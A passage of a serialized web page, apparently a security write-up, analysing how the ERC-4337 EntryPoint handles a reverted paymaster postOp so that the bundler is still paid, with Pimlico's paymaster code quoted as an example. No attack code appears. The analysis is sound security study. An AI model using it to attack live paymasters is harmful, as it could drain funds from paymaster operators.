opInfo.userOpHash,\n",{"type":28,"tag":116,"props":105611,"children":105612},{"class":245,"line":907},[105613],{"type":28,"tag":116,"props":105614,"children":105615},{"style":266},[105616],{"type":33,"value":105617},"                        mUserOp.sender,\n",{"type":28,"tag":116,"props":105619,"children":105620},{"class":245,"line":981},[105621],{"type":28,"tag":116,"props":105622,"children":105623},{"style":266},[105624],{"type":33,"value":105625},"                        mUserOp.nonce,\n",{"type":28,"tag":116,"props":105627,"children":105628},{"class":245,"line":1011},[105629],{"type":28,"tag":116,"props":105630,"children":105631},{"style":266},[105632],{"type":33,"value":105633},"                        result\n",{"type":28,"tag":116,"props":105635,"children":105636},{"class":245,"line":1029},[105637],{"type":28,"tag":116,"props":105638,"children":105639},{"style":266},[105640],{"type":33,"value":105641},"                    );\n",{"type":28,"tag":116,"props":105643,"children":105644},{"class":245,"line":1038},[105645],{"type":28,"tag":116,"props":105646,"children":105647},{"style":266},[105648],{"type":33,"value":70689},{"type":28,"tag":116,"props":105650,"children":105651},{"class":245,"line":1047},[105652,105657],{"type":28,"tag":116,"props":105653,"children":105654},{"style":282},[105655],{"type":33,"value":105656},"                _restoreFreePtr",{"type":28,"tag":116,"props":105658,"children":105659},{"style":266},[105660],{"type":33,"value":105661},"(freePtr);\n",{"type":28,"tag":116,"props":105663,"children":105664},{"class":245,"line":1071},[105665,105670,105674],{"type":28,"tag":116,"props":105666,"children":105667},{"style":266},[105668],{"type":33,"value":105669},"                mode ",{"type":28,"tag":116,"props":105671,"children":105672},{"style":370},[105673],{"type":33,"value":373},{"type":28,"tag":116,"props":105675,"children":105676},{"style":266},[105677],{"type":33,"value":105678}," IPaymaster.PostOpMode.opReverted;\n",{"type":28,"tag":116,"props":105680,"children":105681},{"class":245,"line":1137},[105682],{"type":28,"tag":116,"props":105683,"children":105684},{"style":266},[105685],{"type":33,"value":58503},{"type":28,"tag":116,"props":105687,"children":105688},{"class":245,"line":1181},[105689],{"type":28,"tag":116,"props":105690,"children":105691},{"style":266},[105692],{"type":33,"value":1954},{"type":28,"tag":116,"props":105694,"children":105695},{"class":245,"line":1212},[105696],{"type":28,"tag":116,"props":105697,"children":105698},{"emptyLinePlaceholder":19},[105699],{"type":33,"value":1044},{"type":28,"tag":116,"props":105701,"children":105702},{"class":245,"line":1254},[105703,105707],{"type":28,"tag":116,"props":105704,"children":105705},{"style":260},[105706],{"type":33,"value":102730},{"type":28,"tag":116,"props":105708,"children":105709},{"style":266},[105710],{"type":33,"value":1291},{"type":28,"tag":116,"props":105712,"children":105713},{"class":245,"line":1262},[105714,105718,105722,105726,105730,105734,105738,105742,105746],{"type":28,"tag":116,"props":105715,"children":105716},{"style":339},[105717],{"type":33,"value":102742},{"type":28,"tag":116,"props":105719,"children":105720},{"style":266},[105721],{"type":33,"value":104905},{"type":28,"tag":116,"props":105723,"children":105724},{"style":370},[105725],{"type":33,"value":373},{"type":28,"tag":116,"props":105727,"children":105728},{"style":266},[105729],{"type":33,"value":104914},{"type":28,"tag":116,"props":105731,"children":105732},{"style":370},[105733],{"type":33,"value":3996},{"type":28,"tag":116,"props":105735,"children":105736},{"style":376},[105737],{"type":33,"value":104923},{"type":28,"tag":116,"props":105739,"children":105740},{"style":266},[105741],{"type":33,"value":13709},{"type":28,"tag":116,"props":105743,"children":105744},{"style":370},[105745],{"type":33,"value":2268},{"type":28,"tag":116,"props":105747,"children":105748},{"style":266},[105749],{"type":33,"value":104936},{"type":28,"tag":116,"props":105751,"children":105752},{"class":245,"line":1294},[105753,105757,105761],{"type":28,"tag":116,"props":105754,"children":105755},{"style":260},[105756],{"type":33,"value":1017},{"type":28,"tag":116,"props":105758,"children":105759},{"style":282},[105760],{"type":33,"value":105045},{"type":28,"tag":116,"props":105762,"children":105763},{"style":266},[105764],{"type":33,"value":105765},"(mode, opInfo, context, actualGas);\n",{"type":28,"tag":116,"props":105767,"children":105768},{"class":245,"line":1334},[105769],{"type":28,"tag":116,"props":105770,"children":105771},{"style":266},[105772],{"type":33,"value":1954},{"type":28,"tag":116,"props":105774,"children":105775},{"class":245,"line":1372},[105776],{"type":28,"tag":116,"props":105777,"children":105778},{"style":266},[105779],{"type":33,"value":3025},{"type":28,"tag":29,"props":105781,"children":105782},{},[105783,105785,105790,105792,105797,105799,105805,105807,105813,105815,105820,105822,105832],{"type":33,"value":105784},"We observe that, in the happy path, ",{"type":28,"tag":98,"props":105786,"children":105788},{"className":105787},[],[105789],{"type":33,"value":105136},{"type":33,"value":105791}," is expected to not only execute the actual ",{"type":28,"tag":98,"props":105793,"children":105795},{"className":105794},[],[105796],{"type":33,"value":101796},{"type":33,"value":105798}," call, but also call ",{"type":28,"tag":98,"props":105800,"children":105802},{"className":105801},[],[105803],{"type":33,"value":105804},"_postExecution",{"type":33,"value":105806},". This means that the third failure handling path, which passes ",{"type":28,"tag":98,"props":105808,"children":105810},{"className":105809},[],[105811],{"type":33,"value":105812},"postOpReverted",{"type":33,"value":105814}," as its mode, happens when something goes wrong with the ",{"type":28,"tag":98,"props":105816,"children":105818},{"className":105817},[],[105819],{"type":33,"value":105804},{"type":33,"value":105821}," call ",{"type":28,"tag":4995,"props":105823,"children":105824},{},[105825,105827],{"type":33,"value":105826},"inside ",{"type":28,"tag":98,"props":105828,"children":105830},{"className":105829},[],[105831],{"type":33,"value":105136},{"type":33,"value":141},{"type":28,"tag":29,"props":105834,"children":105835},{},[105836,105838,105843],{"type":33,"value":105837},"Let's examine the ",{"type":28,"tag":98,"props":105839,"children":105841},{"className":105840},[],[105842],{"type":33,"value":105804},{"type":33,"value":105844}," code to understand where the revert might occur.",{"type":28,"tag":234,"props":105846,"children":105848},{"className":4143,"code":105847,"language":4142,"meta":7,"style":7},"    function _postExecution(\n        IPaymaster.PostOpMode mode,\n        UserOpInfo memory opInfo,\n        bytes memory context,\n        uint256 actualGas\n    ) internal virtual returns (uint256 actualGasCost) {\n    [...]\n            if (paymaster == address(0)) {\n                refundAddress = mUserOp.sender;\n            } else {\n                refundAddress = paymaster;\n                if (context.length > 0) {\n                    actualGasCost = actualGas * gasPrice;\n                    uint256 postOpPreGas = gasleft();\n                    if (mode != IPaymaster.PostOpMode.postOpReverted) {\n                        try IPaymaster(paymaster).postOp{\n                                gas: mUserOp.paymasterPostOpGasLimit\n                            }(mode, context, actualGasCost, gasPrice)\n                        // solhint-disable-next-line no-empty-blocks\n                        {} catch {\n                            bytes memory reason = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n                            revert PostOpReverted(reason);\n                        }\n                    }\n                    // Calculating a penalty for unused postOp gas\n                    // note that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n                    uint256 postOpGasUsed = postOpPreGas - gasleft();\n                    postOpUnusedGasPenalty = _getUnusedGasPenalty(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n                }\n            }\n    [...]\n    }\n",[105849],{"type":28,"tag":98,"props":105850,"children":105851},{"__ignoreMap":7},[105852,105867,105892,105911,105930,105942,105979,105986,106018,106035,106050,106066,106090,106115,106139,106161,106179,106196,106204,106222,106238,106271,106289,106296,106303,106311,106327,106359,106381,106388,106395,106402],{"type":28,"tag":116,"props":105853,"children":105854},{"class":245,"line":246},[105855,105859,105863],{"type":28,"tag":116,"props":105856,"children":105857},{"style":376},[105858],{"type":33,"value":89449},{"type":28,"tag":116,"props":105860,"children":105861},{"style":282},[105862],{"type":33,"value":105045},{"type":28,"tag":116,"props":105864,"children":105865},{"style":266},[105866],{"type":33,"value":3133},{"type":28,"tag":116,"props":105868,"children":105869},{"class":245,"line":256},[105870,105875,105879,105883,105888],{"type":28,"tag":116,"props":105871,"children":105872},{"style":376},[105873],{"type":33,"value":105874},"        IPaymaster",{"type":28,"tag":116,"props":105876,"children":105877},{"style":266},[105878],{"type":33,"value":141},{"type":28,"tag":116,"props":105880,"children":105881},{"style":272},[105882],{"type":33,"value":103405},{"type":28,"tag":116,"props":105884,"children":105885},{"style":272},[105886],{"type":33,"value":105887}," mode",{"type":28,"tag":116,"props":105889,"children":105890},{"style":266},[105891],{"type":33,"value":3178},{"type":28,"tag":116,"props":105893,"children":105894},{"class":245,"line":293},[105895,105899,105903,105907],{"type":28,"tag":116,"props":105896,"children":105897},{"style":376},[105898],{"type":33,"value":104353},{"type":28,"tag":116,"props":105900,"children":105901},{"style":376},[105902],{"type":33,"value":102694},{"type":28,"tag":116,"props":105904,"children":105905},{"style":272},[105906],{"type":33,"value":105341},{"type":28,"tag":116,"props":105908,"children":105909},{"style":266},[105910],{"type":33,"value":3178},{"type":28,"tag":116,"props":105912,"children":105913},{"class":245,"line":361},[105914,105918,105922,105926],{"type":28,"tag":116,"props":105915,"children":105916},{"style":339},[105917],{"type":33,"value":105312},{"type":28,"tag":116,"props":105919,"children":105920},{"style":376},[105921],{"type":33,"value":102694},{"type":28,"tag":116,"props":105923,"children":105924},{"style":272},[105925],{"type":33,"value":75960},{"type":28,"tag":116,"props":105927,"children":105928},{"style":266},[105929],{"type":33,"value":3178},{"type":28,"tag":116,"props":105931,"children":105932},{"class":245,"line":387},[105933,105937],{"type":28,"tag":116,"props":105934,"children":105935},{"style":339},[105936],{"type":33,"value":89627},{"type":28,"tag":116,"props":105938,"children":105939},{"style":272},[105940],{"type":33,"value":105941}," actualGas\n",{"type":28,"tag":116,"props":105943,"children":105944},{"class":245,"line":400},[105945,105949,105954,105959,105963,105967,105971,105975],{"type":28,"tag":116,"props":105946,"children":105947},{"style":266},[105948],{"type":33,"value":105369},{"type":28,"tag":116,"props":105950,"children":105951},{"style":376},[105952],{"type":33,"value":105953},"internal",{"type":28,"tag":116,"props":105955,"children":105956},{"style":376},[105957],{"type":33,"value":105958}," virtual",{"type":28,"tag":116,"props":105960,"children":105961},{"style":260},[105962],{"type":33,"value":75613},{"type":28,"tag":116,"props":105964,"children":105965},{"style":266},[105966],{"type":33,"value":269},{"type":28,"tag":116,"props":105968,"children":105969},{"style":339},[105970],{"type":33,"value":45793},{"type":28,"tag":116,"props":105972,"children":105973},{"style":272},[105974],{"type":33,"value":103434},{"type":28,"tag":116,"props":105976,"children":105977},{"style":266},[105978],{"type":33,"value":844},{"type":28,"tag":116,"props":105980,"children":105981},{"class":245,"line":614},[105982],{"type":28,"tag":116,"props":105983,"children":105984},{"style":266},[105985],{"type":33,"value":104414},{"type":28,"tag":116,"props":105987,"children":105988},{"class":245,"line":631},[105989,105993,105998,106002,106006,106010,106014],{"type":28,"tag":116,"props":105990,"children":105991},{"style":260},[105992],{"type":33,"value":58419},{"type":28,"tag":116,"props":105994,"children":105995},{"style":266},[105996],{"type":33,"value":105997}," (paymaster ",{"type":28,"tag":116,"props":105999,"children":106000},{"style":370},[106001],{"type":33,"value":2340},{"type":28,"tag":116,"props":106003,"children":106004},{"style":339},[106005],{"type":33,"value":5921},{"type":28,"tag":116,"props":106007,"children":106008},{"style":266},[106009],{"type":33,"value":313},{"type":28,"tag":116,"props":106011,"children":106012},{"style":350},[106013],{"type":33,"value":353},{"type":28,"tag":116,"props":106015,"children":106016},{"style":266},[106017],{"type":33,"value":34820},{"type":28,"tag":116,"props":106019,"children":106020},{"class":245,"line":665},[106021,106026,106030],{"type":28,"tag":116,"props":106022,"children":106023},{"style":266},[106024],{"type":33,"value":106025},"                refundAddress ",{"type":28,"tag":116,"props":106027,"children":106028},{"style":370},[106029],{"type":33,"value":373},{"type":28,"tag":116,"props":106031,"children":106032},{"style":266},[106033],{"type":33,"value":106034}," mUserOp.sender;\n",{"type":28,"tag":116,"props":106036,"children":106037},{"class":245,"line":713},[106038,106042,106046],{"type":28,"tag":116,"props":106039,"children":106040},{"style":266},[106041],{"type":33,"value":70213},{"type":28,"tag":116,"props":106043,"children":106044},{"style":260},[106045],{"type":33,"value":2986},{"type":28,"tag":116,"props":106047,"children":106048},{"style":266},[106049],{"type":33,"value":1291},{"type":28,"tag":116,"props":106051,"children":106052},{"class":245,"line":750},[106053,106057,106061],{"type":28,"tag":116,"props":106054,"children":106055},{"style":266},[106056],{"type":33,"value":106025},{"type":28,"tag":116,"props":106058,"children":106059},{"style":370},[106060],{"type":33,"value":373},{"type":28,"tag":116,"props":106062,"children":106063},{"style":266},[106064],{"type":33,"value":106065}," paymaster;\n",{"type":28,"tag":116,"props":106067,"children":106068},{"class":245,"line":779},[106069,106073,106078,106082,106086],{"type":28,"tag":116,"props":106070,"children":106071},{"style":260},[106072],{"type":33,"value":103133},{"type":28,"tag":116,"props":106074,"children":106075},{"style":266},[106076],{"type":33,"value":106077}," (context.length ",{"type":28,"tag":116,"props":106079,"children":106080},{"style":370},[106081],{"type":33,"value":645},{"type":28,"tag":116,"props":106083,"children":106084},{"style":350},[106085],{"type":33,"value":2718},{"type":28,"tag":116,"props":106087,"children":106088},{"style":266},[106089],{"type":33,"value":844},{"type":28,"tag":116,"props":106091,"children":106092},{"class":245,"line":796},[106093,106098,106102,106106,106110],{"type":28,"tag":116,"props":106094,"children":106095},{"style":266},[106096],{"type":33,"value":106097},"                    actualGasCost ",{"type":28,"tag":116,"props":106099,"children":106100},{"style":370},[106101],{"type":33,"value":373},{"type":28,"tag":116,"props":106103,"children":106104},{"style":266},[106105],{"type":33,"value":104905},{"type":28,"tag":116,"props":106107,"children":106108},{"style":370},[106109],{"type":33,"value":4240},{"type":28,"tag":116,"props":106111,"children":106112},{"style":266},[106113],{"type":33,"value":106114}," gasPrice;\n",{"type":28,"tag":116,"props":106116,"children":106117},{"class":245,"line":847},[106118,106122,106127,106131,106135],{"type":28,"tag":116,"props":106119,"children":106120},{"style":339},[106121],{"type":33,"value":103091},{"type":28,"tag":116,"props":106123,"children":106124},{"style":266},[106125],{"type":33,"value":106126}," postOpPreGas ",{"type":28,"tag":116,"props":106128,"children":106129},{"style":370},[106130],{"type":33,"value":373},{"type":28,"tag":116,"props":106132,"children":106133},{"style":376},[106134],{"type":33,"value":104923},{"type":28,"tag":116,"props":106136,"children":106137},{"style":266},[106138],{"type":33,"value":1445},{"type":28,"tag":116,"props":106140,"children":106141},{"class":245,"line":898},[106142,106147,106152,106156],{"type":28,"tag":116,"props":106143,"children":106144},{"style":260},[106145],{"type":33,"value":106146},"                    if",{"type":28,"tag":116,"props":106148,"children":106149},{"style":266},[106150],{"type":33,"value":106151}," (mode ",{"type":28,"tag":116,"props":106153,"children":106154},{"style":370},[106155],{"type":33,"value":15350},{"type":28,"tag":116,"props":106157,"children":106158},{"style":266},[106159],{"type":33,"value":106160}," IPaymaster.PostOpMode.postOpReverted) {\n",{"type":28,"tag":116,"props":106162,"children":106163},{"class":245,"line":907},[106164,106169,106174],{"type":28,"tag":116,"props":106165,"children":106166},{"style":260},[106167],{"type":33,"value":106168},"                        try",{"type":28,"tag":116,"props":106170,"children":106171},{"style":282},[106172],{"type":33,"value":106173}," IPaymaster",{"type":28,"tag":116,"props":106175,"children":106176},{"style":266},[106177],{"type":33,"value":106178},"(paymaster).postOp{\n",{"type":28,"tag":116,"props":106180,"children":106181},{"class":245,"line":981},[106182,106187,106191],{"type":28,"tag":116,"props":106183,"children":106184},{"style":266},[106185],{"type":33,"value":106186},"                                gas",{"type":28,"tag":116,"props":106188,"children":106189},{"style":370},[106190],{"type":33,"value":4160},{"type":28,"tag":116,"props":106192,"children":106193},{"style":266},[106194],{"type":33,"value":106195}," mUserOp.paymasterPostOpGasLimit\n",{"type":28,"tag":116,"props":106197,"children":106198},{"class":245,"line":1011},[106199],{"type":28,"tag":116,"props":106200,"children":106201},{"style":266},[106202],{"type":33,"value":106203},"                            }(mode, context, actualGasCost, gasPrice)\n",{"type":28,"tag":116,"props":106205,"children":106206},{"class":245,"line":1029},[106207,106212,106217],{"type":28,"tag":116,"props":106208,"children":106209},{"style":250},[106210],{"type":33,"value":106211},"                        // ",{"type":28,"tag":116,"props":106213,"children":106214},{"style":376},[106215],{"type":33,"value":106216},"solhint-disable",{"type":28,"tag":116,"props":106218,"children":106219},{"style":250},[106220],{"type":33,"value":106221},"-next-line no-empty-blocks\n",{"type":28,"tag":116,"props":106223,"children":106224},{"class":245,"line":1038},[106225,106230,106234],{"type":28,"tag":116,"props":106226,"children":106227},{"style":266},[106228],{"type":33,"value":106229},"                        {} ",{"type":28,"tag":116,"props":106231,"children":106232},{"style":260},[106233],{"type":33,"value":48033},{"type":28,"tag":116,"props":106235,"children":106236},{"style":266},[106237],{"type":33,"value":1291},{"type":28,"tag":116,"props":106239,"children":106240},{"class":245,"line":1047},[106241,106246,106250,106255,106259,106263,106267],{"type":28,"tag":116,"props":106242,"children":106243},{"style":339},[106244],{"type":33,"value":106245},"                            bytes",{"type":28,"tag":116,"props":106247,"children":106248},{"style":376},[106249],{"type":33,"value":102694},{"type":28,"tag":116,"props":106251,"children":106252},{"style":266},[106253],{"type":33,"value":106254}," reason ",{"type":28,"tag":116,"props":106256,"children":106257},{"style":370},[106258],{"type":33,"value":373},{"type":28,"tag":116,"props":106260,"children":106261},{"style":266},[106262],{"type":33,"value":105464},{"type":28,"tag":116,"props":106264,"children":106265},{"style":282},[106266],{"type":33,"value":105555},{"type":28,"tag":116,"props":106268,"children":106269},{"style":266},[106270],{"type":33,"value":105560},{"type":28,"tag":116,"props":106272,"children":106273},{"class":245,"line":1071},[106274,106279,106284],{"type":28,"tag":116,"props":106275,"children":106276},{"style":260},[106277],{"type":33,"value":106278},"                            revert",{"type":28,"tag":116,"props":106280,"children":106281},{"style":282},[106282],{"type":33,"value":106283}," PostOpReverted",{"type":28,"tag":116,"props":106285,"children":106286},{"style":266},[106287],{"type":33,"value":106288},"(reason);\n",{"type":28,"tag":116,"props":106290,"children":106291},{"class":245,"line":1137},[106292],{"type":28,"tag":116,"props":106293,"children":106294},{"style":266},[106295],{"type":33,"value":70596},{"type":28,"tag":116,"props":106297,"children":106298},{"class":245,"line":1181},[106299],{"type":28,"tag":116,"props":106300,"children":106301},{"style":266},[106302],{"type":33,"value":70681},{"type":28,"tag":116,"props":106304,"children":106305},{"class":245,"line":1212},[106306],{"type":28,"tag":116,"props":106307,"children":106308},{"style":250},[106309],{"type":33,"value":106310},"                    // Calculating a penalty for unused postOp gas\n",{"type":28,"tag":116,"props":106312,"children":106313},{"class":245,"line":1254},[106314,106318,106322],{"type":28,"tag":116,"props":106315,"children":106316},{"style":250},[106317],{"type":33,"value":103155},{"type":28,"tag":116,"props":106319,"children":106320},{"style":376},[106321],{"type":33,"value":66379},{"type":28,"tag":116,"props":106323,"children":106324},{"style":250},[106325],{"type":33,"value":106326}," that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n",{"type":28,"tag":116,"props":106328,"children":106329},{"class":245,"line":1262},[106330,106334,106339,106343,106347,106351,106355],{"type":28,"tag":116,"props":106331,"children":106332},{"style":339},[106333],{"type":33,"value":103091},{"type":28,"tag":116,"props":106335,"children":106336},{"style":266},[106337],{"type":33,"value":106338}," postOpGasUsed ",{"type":28,"tag":116,"props":106340,"children":106341},{"style":370},[106342],{"type":33,"value":373},{"type":28,"tag":116,"props":106344,"children":106345},{"style":266},[106346],{"type":33,"value":106126},{"type":28,"tag":116,"props":106348,"children":106349},{"style":370},[106350],{"type":33,"value":3996},{"type":28,"tag":116,"props":106352,"children":106353},{"style":376},[106354],{"type":33,"value":104923},{"type":28,"tag":116,"props":106356,"children":106357},{"style":266},[106358],{"type":33,"value":1445},{"type":28,"tag":116,"props":106360,"children":106361},{"class":245,"line":1294},[106362,106367,106371,106376],{"type":28,"tag":116,"props":106363,"children":106364},{"style":266},[106365],{"type":33,"value":106366},"                    postOpUnusedGasPenalty ",{"type":28,"tag":116,"props":106368,"children":106369},{"style":370},[106370],{"type":33,"value":373},{"type":28,"tag":116,"props":106372,"children":106373},{"style":282},[106374],{"type":33,"value":106375}," _getUnusedGasPenalty",{"type":28,"tag":116,"props":106377,"children":106378},{"style":266},[106379],{"type":33,"value":106380},"(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n",{"type":28,"tag":116,"props":106382,"children":106383},{"class":245,"line":1334},[106384],{"type":28,"tag":116,"props":106385,"children":106386},{"style":266},[106387],{"type":33,"value":70689},{"type":28,"tag":116,"props":106389,"children":106390},{"class":245,"line":1372},[106391],{"type":28,"tag":116,"props":106392,"children":106393},{"style":266},[106394],{"type":33,"value":58503},{"type":28,"tag":116,"props":106396,"children":106397},{"class":245,"line":1381},[106398],{"type":28,"tag":116,"props":106399,"children":106400},{"style":266},[106401],{"type":33,"value":104414},{"type":28,"tag":116,"props":106403,"children":106404},{"class":245,"line":1389},[106405],{"type":28,"tag":116,"props":106406,"children":106407},{"style":266},[106408],{"type":33,"value":3025},{"type":28,"tag":29,"props":106410,"children":106411},{},[106412,106414,106419,106421,106427,106429,106435,106437,106442,106444,106449,106451,106456,106458,106463,106465,106470,106472,106477],{"type":33,"value":106413},"It turns out that if the ",{"type":28,"tag":98,"props":106415,"children":106417},{"className":106416},[],[106418],{"type":33,"value":101995},{"type":33,"value":106420}," call fails, it will revert with ",{"type":28,"tag":98,"props":106422,"children":106424},{"className":106423},[],[106425],{"type":33,"value":106426},"PostOpReverted",{"type":33,"value":106428},". However, as we can see in the previous code of ",{"type":28,"tag":98,"props":106430,"children":106432},{"className":106431},[],[106433],{"type":33,"value":106434},"_executeUserOp",{"type":33,"value":106436},", even though ",{"type":28,"tag":98,"props":106438,"children":106440},{"className":106439},[],[106441],{"type":33,"value":105136},{"type":33,"value":106443}," fails, the execution won't revert. Instead, it will continue to make another ",{"type":28,"tag":98,"props":106445,"children":106447},{"className":106446},[],[106448],{"type":33,"value":105804},{"type":33,"value":106450}," call with ",{"type":28,"tag":98,"props":106452,"children":106454},{"className":106453},[],[106455],{"type":33,"value":105812},{"type":33,"value":106457}," mode, and it won't try to call ",{"type":28,"tag":98,"props":106459,"children":106461},{"className":106460},[],[106462],{"type":33,"value":101995},{"type":33,"value":106464}," again. This means the ",{"type":28,"tag":98,"props":106466,"children":106468},{"className":106467},[],[106469],{"type":33,"value":101856},{"type":33,"value":106471}," still gets paid for submitting the failed ",{"type":28,"tag":98,"props":106473,"children":106475},{"className":106474},[],[106476],{"type":33,"value":101796},{"type":33,"value":141},{"type":28,"tag":29,"props":106479,"children":106480},{},[106481,106483,106488,106490,106495,106497,106504],{"type":33,"value":106482},"Now that we understand this behavior where ",{"type":28,"tag":98,"props":106484,"children":106486},{"className":106485},[],[106487],{"type":33,"value":101995},{"type":33,"value":106489}," is allowed to fail while the ",{"type":28,"tag":98,"props":106491,"children":106493},{"className":106492},[],[106494],{"type":33,"value":101856},{"type":33,"value":106496}," still gets paid, let's examine a real-world example from the most widely used paymaster currently, which is the paymaster implemented by ",{"type":28,"tag":87,"props":106498,"children":106501},{"href":106499,"rel":106500},"https://github.com/pimlicolabs/singleton-paymaster/blob/feat/v8/src/SingletonPaymasterV7.sol",[91],[106502],{"type":33,"value":106503},"Pimlico",{"type":33,"value":141},{"type":28,"tag":234,"props":106506,"children":106508},{"className":4143,"code":106507,"language":4142,"meta":7,"style":7},"    function _postOp(\n        PostOpMode, /* mode */\n        bytes calldata _context,\n        uint256 _actualGasCost,\n        uint256 _actualUserOpFeePerGas\n    )\n        internal\n    {\n        ERC20PostOpContext memory ctx = _parsePostOpContext(_context);\n\n        uint256 expectedPenaltyGasCost = _expectedPenaltyGasCost(\n            _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n        );\n\n        uint256 actualGasCost = _actualGasCost + expectedPenaltyGasCost;\n\n        uint256 costInToken =\n            getCostInToken(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) + ctx.constantFee;\n\n        uint256 absoluteCostInToken =\n            costInToken > ctx.preFundCharged ? costInToken - ctx.preFundCharged : ctx.preFundCharged - costInToken;\n\n        SafeTransferLib.safeTransferFrom(\n            ctx.token,\n            costInToken > ctx.preFundCharged ? ctx.sender : ctx.treasury,\n            costInToken > ctx.preFundCharged ? ctx.treasury : ctx.sender,\n            absoluteCostInToken\n        );\n\n        uint256 preFundInToken = (ctx.preFund * ctx.exchangeRate) / 1e18;\n\n        if (ctx.recipient != address(0) && preFundInToken > costInToken) {\n            SafeTransferLib.safeTransferFrom(ctx.token, ctx.sender, ctx.recipient, preFundInToken - costInToken);\n        }\n\n        emit UserOperationSponsored(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n    }\n",[106509],{"type":28,"tag":98,"props":106510,"children":106511},{"__ignoreMap":7},[106512,106527,106544,106564,106580,106592,106599,106606,106613,106644,106651,106676,106684,106691,106698,106727,106734,106750,106772,106779,106795,106845,106852,106868,106876,106909,106942,106950,106957,106964,107007,107014,107063,107089,107096,107103,107120],{"type":28,"tag":116,"props":106513,"children":106514},{"class":245,"line":246},[106515,106519,106523],{"type":28,"tag":116,"props":106516,"children":106517},{"style":376},[106518],{"type":33,"value":89449},{"type":28,"tag":116,"props":106520,"children":106521},{"style":282},[106522],{"type":33,"value":103396},{"type":28,"tag":116,"props":106524,"children":106525},{"style":266},[106526],{"type":33,"value":3133},{"type":28,"tag":116,"props":106528,"children":106529},{"class":245,"line":256},[106530,106535,106539],{"type":28,"tag":116,"props":106531,"children":106532},{"style":376},[106533],{"type":33,"value":106534},"        PostOpMode",{"type":28,"tag":116,"props":106536,"children":106537},{"style":266},[106538],{"type":33,"value":825},{"type":28,"tag":116,"props":106540,"children":106541},{"style":250},[106542],{"type":33,"value":106543},"/* mode */\n",{"type":28,"tag":116,"props":106545,"children":106546},{"class":245,"line":293},[106547,106551,106555,106560],{"type":28,"tag":116,"props":106548,"children":106549},{"style":339},[106550],{"type":33,"value":105312},{"type":28,"tag":116,"props":106552,"children":106553},{"style":376},[106554],{"type":33,"value":102626},{"type":28,"tag":116,"props":106556,"children":106557},{"style":272},[106558],{"type":33,"value":106559}," _context",{"type":28,"tag":116,"props":106561,"children":106562},{"style":266},[106563],{"type":33,"value":3178},{"type":28,"tag":116,"props":106565,"children":106566},{"class":245,"line":361},[106567,106571,106576],{"type":28,"tag":116,"props":106568,"children":106569},{"style":339},[106570],{"type":33,"value":89627},{"type":28,"tag":116,"props":106572,"children":106573},{"style":272},[106574],{"type":33,"value":106575}," _actualGasCost",{"type":28,"tag":116,"props":106577,"children":106578},{"style":266},[106579],{"type":33,"value":3178},{"type":28,"tag":116,"props":106581,"children":106582},{"class":245,"line":387},[106583,106587],{"type":28,"tag":116,"props":106584,"children":106585},{"style":339},[106586],{"type":33,"value":89627},{"type":28,"tag":116,"props":106588,"children":106589},{"style":272},[106590],{"type":33,"value":106591}," _actualUserOpFeePerGas\n",{"type":28,"tag":116,"props":106593,"children":106594},{"class":245,"line":400},[106595],{"type":28,"tag":116,"props":106596,"children":106597},{"style":266},[106598],{"type":33,"value":23574},{"type":28,"tag":116,"props":106600,"children":106601},{"class":245,"line":614},[106602],{"type":28,"tag":116,"props":106603,"children":106604},{"style":376},[106605],{"type":33,"value":102665},{"type":28,"tag":116,"props":106607,"children":106608},{"class":245,"line":631},[106609],{"type":28,"tag":116,"props":106610,"children":106611},{"style":266},[106612],{"type":33,"value":28842},{"type":28,"tag":116,"props":106614,"children":106615},{"class":245,"line":665},[106616,106621,106625,106630,106634,106639],{"type":28,"tag":116,"props":106617,"children":106618},{"style":266},[106619],{"type":33,"value":106620},"        ERC20PostOpContext ",{"type":28,"tag":116,"props":106622,"children":106623},{"style":376},[106624],{"type":33,"value":75592},{"type":28,"tag":116,"props":106626,"children":106627},{"style":266},[106628],{"type":33,"value":106629}," ctx ",{"type":28,"tag":116,"props":106631,"children":106632},{"style":370},[106633],{"type":33,"value":373},{"type":28,"tag":116,"props":106635,"children":106636},{"style":282},[106637],{"type":33,"value":106638}," _parsePostOpContext",{"type":28,"tag":116,"props":106640,"children":106641},{"style":266},[106642],{"type":33,"value":106643},"(_context);\n",{"type":28,"tag":116,"props":106645,"children":106646},{"class":245,"line":713},[106647],{"type":28,"tag":116,"props":106648,"children":106649},{"emptyLinePlaceholder":19},[106650],{"type":33,"value":1044},{"type":28,"tag":116,"props":106652,"children":106653},{"class":245,"line":750},[106654,106658,106663,106667,106672],{"type":28,"tag":116,"props":106655,"children":106656},{"style":339},[106657],{"type":33,"value":89627},{"type":28,"tag":116,"props":106659,"children":106660},{"style":266},[106661],{"type":33,"value":106662}," expectedPenaltyGasCost ",{"type":28,"tag":116,"props":106664,"children":106665},{"style":370},[106666],{"type":33,"value":373},{"type":28,"tag":116,"props":106668,"children":106669},{"style":282},[106670],{"type":33,"value":106671}," _expectedPenaltyGasCost",{"type":28,"tag":116,"props":106673,"children":106674},{"style":266},[106675],{"type":33,"value":3133},{"type":28,"tag":116,"props":106677,"children":106678},{"class":245,"line":779},[106679],{"type":28,"tag":116,"props":106680,"children":106681},{"style":266},[106682],{"type":33,"value":106683},"            _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, 